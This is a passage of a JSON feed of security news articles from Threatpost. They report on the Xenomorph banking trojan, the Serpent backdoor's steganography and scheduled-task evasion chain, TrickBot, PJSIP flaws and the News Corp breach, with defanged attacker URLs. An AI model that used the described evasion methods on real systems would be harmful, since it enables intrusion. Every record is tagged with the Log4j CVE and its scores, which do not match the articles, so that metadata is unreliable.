"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-22T18:08:28", "description": "An Android trojan dubbed Xenomorph has nested in Google Play, already racking up more than 50,000 downloads from the official app store, researchers warned. For anyone who downloaded the \u201cFast Cleaner\u201d app, it\u2019s time to nuke it from orbit.\n\nAccording to a ThreatFabric analysis, Xenomorph has a target list of 56 different European banks, for which it provides convincing facsimiles of log-in pages whenever a victim attempts to log into a mobile banking app. The goal of course is to steal any credentials that victims enter into the faux log-in overlay.\n\nHowever, the malware is also a flexible, modular banking trojan, which has code overlaps and other ties to the Alien malware \u2013 hence the name. It notably contains the ability to abuse Android\u2019s accessibility services for broad control over a device\u2019s capabilities, which could open the door to dangerous features that go beyond hijacking mobile banking credentials.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE!\n\n\u201cThe Accessibility engine powering this malware, together with the infrastructure and command-and-control (C2) protocol, are carefully designed to be scalable and updatable,\u201d the researchers warned in a [Monday posting](<https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html>). \u201cThe information stored by the logging capability of this malware is very extensive, and if sent back to the C2 server, could be used to implement keylogging, as well as collecting behavioral data on victims and on installed applications, even if they are not part of the list of targets.\u201d\n\nThat advanced functionality is not yet implemented, so the researchers have deemed Xenomorph as still under development. However, they noted that it\u2019s already making a mark on the banking trojan front: \u201cXenomorph is already sporting effective overlays [for banking apps] and being actively distributed on official app stores.\u201d\n\nIt also uses SMS and notification-interception to log and use potential two-factor authentication (2FA) tokens, according to ThreatFabric. And, they added, \u201cIt would be unsurprising to see this bot sport semi-automatic transfer system (ATS) capabilities in the very near future.\u201d\n\nATS is the process of automatically initiating wire transfers from the victims without needing to use credentials, thus bypassing 2FA and all anti-fraud measures.\n\nThreatFabric observed the malware being loaded by a dropper hiding in a Google Play application called \u201cFast Cleaner\u201d (since reported to Google). Sporting 50,000 installations, it purported to remove unused clutter and battery optimization blocks for better device processing times.\n\n\u201cThis is not an uncommon lure, and we have seen malware families like Vultur and Alien being deployed by such application[s],\u201d the researchers said.\n\n## **Inside the Shell: Xenomorph\u2019s Core Functionality **\n\nIn terms of its main overlay attack vector, Xenomorph is powered by Accessibility Services privileges, the researchers found.\n\n\u201cOnce the malware is up and running on a device, its background services receive Accessibilty events whenever something new happens on the device,\u201d they explained in a Monday posting. \u201cIf the application opened is part of the list of targets, then Xenomorph will trigger an overlay injection and show a WebView Activity posing as the targeted package.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/22123754/Alien-xenomorph-scaled-e1645551511463.jpeg>)\n\nMore specifically, once installed, the malware enumerates and sends back a list of installed packages on the infected device. Based on what targeted applications are present, it goes on to download the corresponding overlays to inject.\n\n\u201cThe list of overlay targets returned by Xenomorph includes targets from Spain, Portugal, Italy and Belgium, as well as some general purpose applications like emailing services, and cryptocurrency wallets,\u201d according to ThreatFabric.\n\nAfter obtaining Accessibility Services privileges, Xenomorph will first register and verify itself with the C2, by sending a request using the legitimate, open-source project Retrofit2 (a type-safe REST client for Android, Java and Kotlin developed by Square).\n\nThat first message contains the initial information exfiltrated about the device, according to ThreatFabric. After that, Xenomorph periodically polls for new commands from the C2.\n\nFor now, the commands allow the malware to log SMS messages, list the web injects sent by the C2, enable or disable intercept notifications, and enumerate installed apps.\n\nMeanwhile, the malware also performs the aforementioned logging: \u201cAll the information gathered is only displayed on the local device logs, but in the future a very minor modification would be enough to add keylogging and Accessibility logging capabilities to the malware,\u201d researchers warned.\n\n## **Part of the Alien Franchise?**\n\nThreatFabric\u2019s analysis uncovered evidence of code reuse that links Xenomorph to the known Alien malware, which is a descendent of the [infamous Cerberus malware](<https://threatpost.com/cerberus-banking-trojan-unleashed-google-play/157218/>).\n\nThese include the \u201cuse of the same HTML resource page to trick victims into granting the Accessibility Services privileges.\u201d And further, Xenomorph uses state-tracking through the use of the \u201cSharedPreferences\u201d file.\n\n\u201cThis file is commonly used to track the state of an application,\u201d researchers noted. \u201cHowever, the style of variable naming used by Xenomorph is very reminiscent of Alien, despite being potentially even more detailed.\u201d\n\nThey added, \u201cpotentially the most interesting fact is the actual name of the sharedPreferences file used to store the configuration for Xenomorph: the file is named ring0.xml. This might look like any other generic random string, but it happens to coincide with the name of the supposed actor behind the development of the original Alien malware.\u201d\n\nEven though for now Xenomorph is a fairly typical banking trojan, ThreatFabric noted that it does have untapped potential.\n\n\u201cModern banking malware is evolving at a very fast rate, and criminals are starting to adopt more refined development practices to support future updates,\u201d researchers concluded. \u201cXenomorph is at the forefront of this change\u2026ThreatFabric predicts that with some more time to finish development, this malware could reach higher threat levels, comparable to other modern Android banking trojans.\u201d\n\n_**Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>), \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be **_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-22T18:00:30", "type": "threatpost", "title": "Xenomorph Malware Burrows into Google Play Users, No Facehugger Required", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T18:00:30", "id": "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "href": "https://threatpost.com/xenomorph-malware-google-play-facehugger/178563/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-22T14:28:59", "description": "Researchers have discovered a cyberattack that uses unusual evasion tactics to [backdoor](<https://threatpost.com/fin8-bank-sardonic-backdoor/168982/>) French organizations with a novel malware dubbed Serpent, they said.\n\nA team from Proofpoint observed what they call an \u201cadvanced, targeted threat\u201d that uses email-based lures and malicious files typical of many malware campaigns to deliver its ultimate payload to targets in the French construction, real-estate and government industries.\n\nHowever, between initial contact and payload, the attack uses methods to avoid detection that haven\u2019t been seen before, researchers revealed [in a blog post](<https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain>) Monday.\n\nThese include the use of a legitimate software package installer called Chocolatey as an initial payload, equally legitimate Python tools that wouldn\u2019t be flagged in network traffic, and a novel detection bypass technique using a Scheduled Task, they said.\n\n\u201cThe ultimate objectives of the threat actor are presently unknown,\u201d Proofpoint researchers Bryan Campbell, Zachary Abzug, Andrew Northern and Selena Larson acknowledged in the post. \u201cSuccessful compromise would enable a threat actor to conduct a variety of activities, including stealing information, obtaining control of an infected host or installing additional payloads.\u201d\n\n## **Serpent: A Slippery Attack Chain**\n\nThe attack chain begins as many [email-based attacks](<https://threatpost.com/ransomware-phishing-emails-segs/176470/>) do\u2014with an email that appears to be coming from a legitimate source that includes a Microsoft Word document containing malicious macros. Various parts of the macro include ASCII art that depicts a snake, giving the [backdoor](<https://threatpost.com/tomiris-backdoor-solarwinds-malware/175091/>) its name, researchers said.\n\nThe macro-laden document purports to have important information related to the \u201cr\u00e8glement g\u00e9n\u00e9ral sur la protection des donn\u00e9es (RGPD),\u201d aka the European Union\u2019s General Data Protection Regulations (GDPR), a law which mandates how companies must report data leaks to the government.\n\nIf macros are enabled, the document executes the document\u2019s macro, which reaches out to an image URL\u2013e.g., https://www.fhccu[.]com/images/ship3[.]jpg\u2013that contains a base64 encoded PowerShell script hidden [using steganography](<https://threatpost.com/steganography-combat/143096/>).\n\nThe PowerShell script first downloads, installs and updates the installer package and repository [script](<https://chocolatey.org/install.ps1>) for Chocolatey, a software management automation tool for Windows that wraps installers, executables, .ZIP files and scripts into compiled packages, researchers said.\n\n\u201cLeveraging Chocolatey as an initial payload may allow the threat actor to bypass threat-detection mechanisms because it is a legitimate software package and would not immediately be identified as malicious,\u201d researchers noted.\n\nThe script then uses Chocolatey to install Python, including the [pip](<https://pypi.org/project/pip/>) Python package installer. This component then installs various dependencies including [PySocks](<https://pypi.org/project/PySocks/>), a Python-based reverse proxy client that enables users to send traffic through SOCKS and HTTP proxy servers, researchers said.\n\nNext, the PowerShell script fetches another image file\u2013e.g. https://www.fhccu[.]com/images/7[.]jpg,\u2013which contains a base64 encoded Python script that also is obscured using steganography, they said. The PowerShell script saves the Python script as \u201cMicrosoftSecurityUpdate.py\u201d and then creates and executes a .bat file that in turn executes the Python script.\n\nThe attack chain ends with a command to a shortened URL which redirects to the Microsoft Office help website, researchers said. The steganographic images used to hide the scripts are hosted on what appears to be a Jamaican credit-union website, they added.\n\n## **Serpent Backdoor**\n\nOnce successfully installed on a targeted system, the Serpent backdoor periodically pings the \u201corder\u201d server, or the first onion[.]pet URL), and expects responses of the form &lt;random integer&gt;\u2013&lt;hostname&gt;\u2013&lt;command&gt;.\n\nIf &lt;hostname&gt; matches the hostname of the infected computer, the infected host runs the command provided by the order server (&lt;command&gt;), researchers said. This could be any Windows command as designated by the attacker, the output of which is then recorded.\n\nNext, Serpent uses PySocks to connect to the command-line Pastebin tool called Termbin, pastes the output to a bin, and receives the bin\u2019s unique URL.\n\nAs its final act, the backdoor sends a request to the \u201canswer\u201d server (a second onion[.]pet URL), including the hostname and bin URL in the header. This allows the attacker to monitor the bin outputs via the \u201canswer\u201d URL and see what the infected host\u2019s response was, researchers observed. Once this entire process is complete, Serpent cycles through it indefinitely, they added.\n\n## **Task-Scheduler Evasion Tactic**\n\nIn addition to using steganographic images and the Chocolatey package installer to hide its nefarious activities, the attack also uses what Proofpoint researchers said is a never-before-seen application of signed binary proxy execution using a Scheduled Tasks executable, as \u201can attempt to bypass detection by defensive measures.\u201d\n\nA command that leverages schtasks.exe to create a one-time task to call a portable executable is contained within a Swiper image called ship.jpg after the end of file marker, researchers said.\n\n\u201cIn this case the executable is called calc.exe,\u201d researchers wrote in the post. The trigger for this task is contingent on the creation of a Windows event with EventID of 777, after which the command then creates a dummy event to trigger the task ,and deletes the task from the task scheduler as if it never occurred, they said.\n\n\u201cThis peculiar application of tasking logic results in the portable executable being executed as a child process of taskhostsw.exe, which is a signed Windows binary,\u201d researchers said.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-22T14:21:42", "type": "threatpost", "title": "Serpent Backdoor Slithers into Orgs Using Chocolatey Installer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-22T14:21:42", "id": "THREATPOST:16624FA0DF55AAB9FDB3C14AC91EC9F5", "href": "https://threatpost.com/serpent-backdoor-chocolatey-installer/179027/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-26T00:10:25", "description": "The group behind the TrickBot malware is back after an unusually long lull between campaigns, according to researchers \u2014 but it\u2019s now operating with diminished activity. They concluded that the pause could be due to the TrickBot gang making a large operational shift to focus on partner malware, such as Emotet.\n\nA [report](<https://intel471.com/blog/trickbot-2022-emotet-bazar-loader>) from Intel 471 published on Thursday flagged a \u201cstrange\u201d period of relative inactivity, where \u201cfrom December 28, 2021 until February 17, 2022, Intel 471 researchers have not seen new TrickBot campaigns.\u201d\n\nBefore the lull, an [incident](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) last November indicated that the TrickBot botnet was used to distribute Emotet \u2013 indicating that the collaboration with the group behind the Emotet malware is ongoing. Intel 471 also tied in a third group \u2013 the operators of the Bazar malware family \u2013 whose controllers were found \u201cpushing commands to download and execute TrickBot (mid-2021) and Emotet (November 2021).\u201d\n\nThe report noted how, in years past, malicious actors have used TrickBot to install Emotet on target machines, and vice versa. Researchers speculated that, this time around, \u201cit\u2019s likely that the TrickBot operators have phased TrickBot malware out of their operations in favor of other platforms, such as Emotet.\u201d\n\n## **TrickBot\u2019s \u2018Turbulent\u2019 Recent History**\n\nTrickBot was originally deployed as a banking trojan, in 2016. In the time since, it\u2019s developed into a full-suite malware ecosystem, replete with tools for [spying and stealing data](<https://threatpost.com/trickbot-malware-virtual-desktop-espionage/167789/>), [port scanning](<https://threatpost.com/trickbot-port-scanning-module/163615/>), [anti-debugging](<https://threatpost.com/trickbot-crash-security-researchers-browsers/178046/>) \u2013 crashing researchers\u2019 browsers before they have a chance to identify its presence \u2013 [identifying and wiping firmware](<https://threatpost.com/trickbot-returns-bootkit-functions/161873/>), and much more.\n\nTrickBot has received particular attention from authorities in recent years. In 2020, Microsoft obtained a U.S. court order that allowed it to [seize](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>) servers from the group behind the malware. Last year, [multiple](<https://threatpost.com/trickbot-coder-decades-prison/166732/>) [members](<https://threatpost.com/authorities-arrest-trickbot-member/169236/>) of that group were arrested and handed charges carrying potentially years-long prison sentences. Despite these efforts, TrickBot remained active.\n\nUntil late last December, that is, when new attacks ground to a halt. According to the report, Trickbot\u2019s most recent campaign \u201ccame on December 28, 2021. That was one of three malware campaigns that were active during the month. As a contrast, eight different [campaigns] were discovered in November 2021.\u201d\n\n\u201cWhile there have been lulls from time-to-time,\u201d the report noted, \u201cthis long of a break can be considered unusual.\u201d\n\nThe decline in activity continues as well: TrickBot\u2019s onboard malware configuration files, which contain a list of controller addresses to which the bot can connect, \u201chave gone untouched for long periods of time,\u201d researchers said.\n\nTellingly, these files \u201cwere once updated frequently, but are receiving fewer and fewer updates,\u201d researchers said. On the other hand, command-and-control (C2) infrastructure associated with TrickBot remains active, with updates adding \u201cadditional plugins, web injects and additional configurations to bots in the botnet.\u201d\n\nThe researchers have now concluded with high confidence that \u201cthis break is partially due to a big shift from TrickBot\u2019s operators, including working with the operators of Emotet.\u201d\n\n## **An Old Alliance**\n\nAs noted, the collaboration with Emotet (and Bazar Loader, for that matter) is not new. But researchers told Threatpost that the nature of the relationship could be evolving.\n\n\u201cIt\u2019s difficult to say what could result from the collaboration,\u201d wrote Hank Schless, senior manager for security solutions at Lookout, via email. \u201cWe do know that Emotet recently began testing how it could install Cobalt Strike beacons on previously infected devices, so maybe they could combine functionality with TrickBot.\u201d Cobalt Strike is a penetration testing tool used by cyber-analysts [and attackers](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) alike.\n\n\u201cIn the security industry, knowledge-sharing is how we discover some of the most nefarious threats,\u201d he noted. \u201cHowever, on the flip side of the coin you have threat actors who are doing the same thing \u2026 they share their malware on Dark Web forums and other platforms in ways that help the entire community advance their tactics.\u201d\n\nSometimes, cybercrime gangs have \u201cpartnerships or business relationships much like those that happen in conventional business,\u201d John Bambenek, principal threat hunter at Netenrich, told Threatpost via email. \u201cIn this case, it looks like the crew behind TrickBot decided it was easier to \u2018buy\u2019 than \u2018build.'\u201d\n\nSome think the malware may be on its way out. After all, TrickBot is now five years old: a lifetime in cybersecurity terms. \u201cPerhaps,\u201d Intel 471 researchers wrote, \u201ca combination of unwanted attention to TrickBot and the availability of newer, improved malware platforms has convinced the operators of TrickBot to abandon it.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our_** [**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-25T21:32:15", "type": "threatpost", "title": "TrickBot Takes a Break, Leaving Researchers Scratching Their Heads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-25T21:32:15", "id": "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "href": "https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-01T21:49:53", "description": "[WhatsApp](<https://threatpost.com/facebooks-mandatory-data-sharing-whatsapp-ire/162828/>) and [BlueJeans](<https://www.bluejeans.com/>) are just two of the world\u2019s most popular communication apps that are using an open-source library riddled with newfound security holes.\n\nOne thing this open-source, flawed library shares with the Apache Log4J logging library [fiasco](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) that started in December: It\u2019s ubiquitous.\n\nThe library, [PJSIP](<https://github.com/pjsip/pjproject>) \u2013 an open-source multimedia communication library \u2013 is also used by[ Asterisk](<https://www.asterisk.org/>). Asterisk is an enterprise-class, open-source PBX (private branch exchange) [toolkit](<https://threatpost.com/voip-espionage-campaign-utilities-supplier/148916/>) that\u2019s used in voice-over-IP (VoIP) services in a massive number of implementations.\n\nAccording to the Asterisk site, the software is downloaded 2M times annually and runs on 1M servers in 170 countries. Asterisk powers IP PBX systems, VoIP gateways and conference servers, and it\u2019s used by SMBs, enterprises, call centers, carriers and governments.\n\nOn Monday, devops platform provider JFrog Security [disclosed](<https://jfrog.com/blog/jfrog-discloses-5-memory-corruption-vulnerabilities-in-pjsip-a-popular-multimedia-library/>) five memory-corruption vulnerabilities in PJSIP, which supplies an API that can be used by [IP telephony applications](<https://trac.pjsip.org/repos/wiki/Projects_Using_PJSIP>) such as voice-over-IP (VoIP) phones and conference apps.\n\nAn attacker who successfully triggers the vulnerabilities can flip the switch on remote code execution (RCE) in an application that uses the PJSIP library, JFrog researchers explained.\n\nFollowing JFrog\u2019s disclosure, PJSIP\u2019s maintainers have fixed the five CVEs, depicted below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/01155749/PJSIP-security-vulnerabilities-e1646168517426.png>)\n\nThe disclosed PJSIP security vulnerabilities. Source: JFrog Security.\n\n## What Went Wrong\n\nIn its technical breakdown, JFrog researchers explained that the PJSIP framework offers a library named PJSUA that supplies an API for SIP applications.\n\n\u201cThe basic PJSUA APIs are also wrapped by object-oriented APIs. PJSUA offers a rich Media Manipulation API, where we have spotted the [five] vulnerabilities,\u201d they said.\n\nThree of the flaws are stack overflow vulnerabilities that can lead to RCE and which are rated 8.1 on the CVSS severity-rating scale.\n\nThe remaining two include a read out-of-bounds vulnerability and a buffer overflow weakness in the PJSUA API, both of which can lead to denial-of-service (DoS) and both of which are rated at CVSS 5.9.\n\n## Vulnerable Projects\n\nJFrog said that projects that use the PJSIP library before version 2.12 and which pass attacker-controlled arguments to any of the following APIs are vulnerable:\n\n * pjsua_player_create \u2013 filename argument must be attacker-controlled\n * pjsua_recorder_create \u2013 filename argument must be attacker-controlled\n * pjsua_playlist_create \u2013 file_names argument must be (partially) attacker-controlled\n * pjsua_call_dump \u2013 buffer argument capacity must be smaller than 128 bytes\n\nJFrog recommended upgrading PJSIP to version 2.12 to address the vulnerabilities.\n\n## Not the First Time\n\nPockmarks in PJSIP and other common videoconferencing architecture implementations are nothing new. In August 2018, Google Project Zero researcher Natalie Silvanovich [disclosed](<https://googleprojectzero.blogspot.com/2018/12/adventures-in-video-conferencing-part-1.html>) critical vulnerabilities in most of the common ones, including WebRTC (used by Chrome, Safari, Firefox, Facebook Messenger, Signal and others), PJSIP (which, again, is used by WhatsApp, BlueJeans and millions of implementations of Asterisk) and Apple\u2019s proprietary library for FaceTime.\n\n\u201cIf exploited, such vulnerabilities would have let attackers crash apps using the implementation, by merely placing a video call,\u201d noted Ronen Slavin, then head of research at Reason Cybersecurity and currently the co-founder and CTO at the source code control, detection, and response platform Cycode, back in 2019. \u201cThis would have then triggered a memory heap overflow which could allow the attacker to take over the victim\u2019s video calling account.\u201d\n\nApps such as Skype, Google Hangouts and WhatsApp \u201chave made it easy to have meaningful face-to-face interactions across between two points anywhere on the globe,\u201d he [wrote](<https://www.infosecurity-magazine.com/opinions/hacking-video-conferencing/>).\n\nIt was true then. But since, the pandemic has been gas on the fire when it comes to virtual connections: all the more reason to heed JFrog\u2019s advice and patch ASAP.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T21:44:32", "type": "threatpost", "title": "RCE Bugs in WhatsApp, Other Hugely Popular VoIP Apps: Patch Now!", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-01T21:44:32", "id": "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "href": "https://threatpost.com/rce-bugs-whatsapp-popular-voip-apps-patch-now/178719/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "The Chinese hackers responsible for an attack on media giant News Corp last month likely were seeking intelligence to serve China\u2019s interests in a cyberespionage incident that shows the persistent vulnerability of corporate networks to email-based attacks, security professionals said.\n\n[Reports](<https://www.theguardian.com/media/2022/feb/04/new-corp-hack-murdoch-media-firm-believes-hackers-links-china>) on Monday revealed that a Jan. 20 incident at Rupert Murdoch\u2019s media giant involved an attack on journalists\u2019 email accounts that gave the intruders access to sensitive data. The breach \u2013 limited to several individuals working for outlets including News UK, the Wall Street Journal and the New York Post \u2013 has raised concerns over the safety of confidential sources working with journalists affected by the incident.\n\nIn an email to staff, News Corp cited a \u201cforeign government\u201d as responsible for the \u201cpersistent nation-state attack\u201d and confirmed that \u201csome data\u201d was stolen, according to published reports. The media giant enlisted the help of cybersecurity firm [Mandiant](<https://www.mandiant.com/>) to investigate the incident, which the firm said is likely the work of a China-sponsored actor.\n\n\u201cMandiant assesses that those behind this activity have a China nexus, and we believe they are likely involved in espionage activities to collect intelligence to benefit China\u2019s interests,\u201d said David Wong, vice president of consulting at Mandiant, in an emailed statement to Threatpost.\n\n## **Targeting Journalists for Cyberespionage**\n\nIndeed, while China typically targets \u201cmilitary and intellectual property\u201d in its state-sponsored attacks, journalists also are \u201cfairly high on their radar for espionage\u201d due to their work with sources \u2013 confidential and otherwise, as noted by one cybersecurity professional.\n\n\u201cJournalists can have access to sources and intelligence about adversaries and other opponents of the Chinese regime, both foreign and domestic, or can be researching stories that could generate negative publicity for the Chinese government,\u201d Mike McLellan, director of intelligence for cyber threat intelligence firm [Secureworks Counter Threat Unit](<https://www.secureworks.com/about/counter-threat-unit>), wrote in an email to Threatpost on Monday.\n\nPaul Farrington, chief product officer for security firm [ Glasswall](<https://glasswallsolutions.com/>), agreed that it\u2019s \u201ccommon for politically motivated cybercriminals to mine reporters\u2019 materials for intelligence,\u201d given their frequent conversations with confidential sources that have access to information about current and future geopolitical events.\n\nMoreover, China has previously shown an interest in attacking journalists, making this latest attack \u201centirely consistent with past Chinese state-sponsored behavior,\u201d concurred Dave Merkel, CEO of cybersecurity firm [Expel](<http://www.expel.io/>).\n\nHe cited [a previous attack](<https://threatpost.com/inside-targeted-attack-new-york-times-013113/77477/>) on the New York Times by China in 2013 as a precedent for the nation\u2019s targeting of journalists. Moreover, the threat actors\u2019 use of business email compromise (BEC) to pull off the attack \u201cmakes sense\u201d and also is consistent with nation-state actors, Merkel observed.\n\n\u201cWhen it comes to cyberattacks, nation state actors will only be as advanced as they have to \u2013 why burn expensive zero days if you don\u2019t need to?\u201d he said.\n\n## **Preventing BEC Attacks**\n\nIn fact, Merkel said the No. 1 source of attacks against Expel customers is BEC. \u201cThere\u2019s no reason to think Chinese state-sponsored groups wouldn\u2019t use the same tactics against their targets if those tactics work \u2013 and news organizations are definitely targets,\u201d he said.\n\nIndeed, BEC is a major threat that typically involves human error. The way it works is that an employee at a company receives an email with a malicious link or document and takes an action that can install malware on their computers. This can result in consequences from local data theft to giving threat actors access to the corporate network to advanced attack vectors such as ransomware.\n\nMicrosoft unveiled a timely yet unrelated step this week that could help mitigate the impact of, or even prevent, future BEC attacks: Namely, the company will soon begin blocking, by default, VBA macros obtained from the internet in five Office apps, as the company [revealed in a blog post](<https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805>) Monday.\n\n\u201cFor macros in files obtained from the internet, users will no longer be able to enable content with a click of a button,\u201d Microsoft Principal Program Manager Kellie Eickmeyer wrote. \u201cA message bar will appear for users notifying them with a button to learn more.\u201d\n\nThis default setting \u201cis more secure and is expected to keep more users safe including home users and information workers in managed organizations,\u201d she added. Indeed, sending documents loaded with macros that immediately install malware on people\u2019s computers with one click is a popular tactic of email-based attacks.\n\nThe new default setting will apply to Microsoft Office on devices running Windows for Access, Excel, PowerPoint, Visio and Word. Microsoft will roll out the change first in a preview version of Office 2023, starting with its Current Channel update channel in early April 2022.\n\nLater, the change will be available in the other update channels, such as Current Channel, Monthly Enterprise Channel, and Semi-Annual Enterprise Channel. In the future Microsoft also will change the Office default setting for VBA macros in Office LTSC, Office 2021, Office 2019, Office 2016 and Office 2013, Eickmeyer added.\n\nThis move may make it more difficult to slip malware past corporate employees using BEC tactics. However, as one security professional noted, companies still must remain vigilant and take an \u201call hands on deck\u201d approach to both threat mitigation and response, given the evolving nature and increased occurrence of cyber-attacks that organizations face.\n\n\u201cAs the threat environment continues to change, proper and continuous diligence is required to ensure all cyber defensive tools and techniques are employed to protect your most precious data assets,\u201d observed Tom Garrubba, vice president at risk-management firm [Shared 